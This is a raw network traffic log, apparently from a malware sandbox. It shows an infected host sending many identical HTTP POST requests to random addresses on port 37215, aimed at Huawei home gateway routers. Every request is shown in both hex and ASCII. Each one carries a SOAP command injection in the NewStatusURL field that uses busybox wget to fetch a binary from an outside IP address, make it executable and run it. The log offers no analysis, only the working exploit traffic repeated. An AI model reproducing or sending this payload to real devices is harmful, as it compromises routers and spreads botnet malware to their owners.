                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            646192.168.2.153688841.54.226.16337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160557032 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            647192.168.2.154864441.37.50.17137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160563946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            648192.168.2.154210241.88.71.24037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160614014 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            649192.168.2.155789441.113.159.3237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160620928 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            650192.168.2.154771641.155.152.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160644054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            651192.168.2.155404641.79.219.13137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160676956 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            652192.168.2.155806241.212.105.5537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160676956 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            653192.168.2.154088441.188.143.4337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160677910 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            654192.168.2.155745641.49.131.4737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160681963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            655192.168.2.155049841.136.222.18437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160682917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
